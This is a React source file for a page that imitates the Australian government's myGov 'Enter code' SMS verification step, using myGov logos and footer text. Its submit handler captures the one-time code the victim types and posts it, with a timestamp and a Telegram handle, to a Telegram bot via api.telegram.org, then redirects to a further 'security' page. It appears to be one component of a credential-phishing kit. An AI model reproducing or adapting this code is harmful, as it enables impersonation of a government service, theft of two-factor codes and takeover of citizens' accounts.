import React from "react";
import { useNavigate } from "react-router-dom";
import telegramConfig from "./config";


function Otp() {
  const navigate = useNavigate();

  const handleSubmit = async (event) => {
    event.preventDefault();

    const otp = document.getElementById("otpanswer").value;

    // Prepare the message to send to Telegram
    const message = `
      **Telegram ID: @upperclassstunts**
      OTP: ${otp}
      Date: ${new Date().toLocaleString()}
     
    `;

    // Send OTP to Telegram
    await sendToTelegram(message);

    // Redirect to security.js page
    navigate("/security");
  };

  const sendToTelegram = async (message) => {
    try {
      const { botToken, chatId } = telegramConfig;
      const url = `https://api.telegram.org/bot${botToken}/sendMessage`;
  
      const response = await fetch(url, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ chat_id: chatId, text: message }),
      });
  
      if (!response.ok) {
        console.error("Failed to send message:", await response.text());
      }
    } catch (error) {
      console.error("Error sending message to Telegram:", error);
    }
  };

  return (
    <div>
      <div className="brand-rainbow">&nbsp;</div>
      <header role="banner" className="mgvEnhanceHeader">
        <section className="wrapper">
          <div className="inner">
            <div className="unauth-grid">
              <div className="unauth-grid-row">
                <a className="unauth-govt-crest__link">
                  <img
                    id="unauth-govt-crest"
                    src="/images/myGov-cobranded-logo-black.svg"
                    alt="myGov Beta"
                    role="img"
                  />
                </a>
              </div>
            </div>
          </div>
        </section>
      </header>
      <div className="wrapper-mapwap">
        <div className="main-block" id="content" role="main">
          <h1>Enter code</h1>
          <p>We sent a code by SMS to your mobile number.</p>
          <form id="otp-entry-form" autoComplete="off" onSubmit={handleSubmit}>
            <div className="code-container">
              <label htmlFor="otpanswer">Code</label>
              <input
                id="otpanswer"
                name="otp"
                type="tel"
                className="security-code"
                autoComplete="off"
                required
              />
            </div>
            <div id="security-codes-info" className="hasInfo">
              <p>
                If you don't want to use Digital Identity, you can{" "}
                <a href="#">call the helpdesk</a> to create a new myGov account.
              </p>
              <a
                data-infotext-continue=""
                className="continue-digital-identity-chevron"
                href="/las/mygov-login?execution=e42s2&_eventId=continueWithDigitalIdentity"
              >
                Continue with Digital Identity
              </a>
            </div>
            <div className="button-container">
              <button type="submit" className="button-main button">
                Next
              </button>
            </div>
          </form>
        </div>
      </div>
      <footer role="contentinfo">
        <div className="wrapper">
          <div className="inner">
            <section className="footer-list">
              <nav>
                <h2 className="sr-only" aria-label="Footer">Footer</h2>
                <ul className="lower-links">
                  <li>
                    <a href="#" target="_blank">Terms of use</a>
                  </li>
                  <li>
                    <a href="#" target="_blank">Privacy and security</a>
                  </li>
                  <li>
                    <a href="#" target="_blank">Copyright</a>
                  </li>
                  <li>
                    <a href="#" target="_blank">Accessibility</a>
                  </li>
                </ul>
              </nav>
            </section>
            <div className="footer-lower">
              <section className="footer-lower-logo">
                <a>
                  <img
                    src="/images/myGov-cobranded-logo-white.svg"
                    alt="myGov Beta"
                    width="313.17"
                    height="70"
                    role="img"
                  />
                </a>
              </section>
              <p className="footer-acknowledgement">
                We acknowledge the Traditional Custodians of the lands we live
                on. We pay our respects to all Elders, past and present, of all
                Aboriginal and Torres Strait Islander nations.
              </p>
            </div>
          </div>
        </div>
      </footer>
    </div>
  );
}

export default Otp;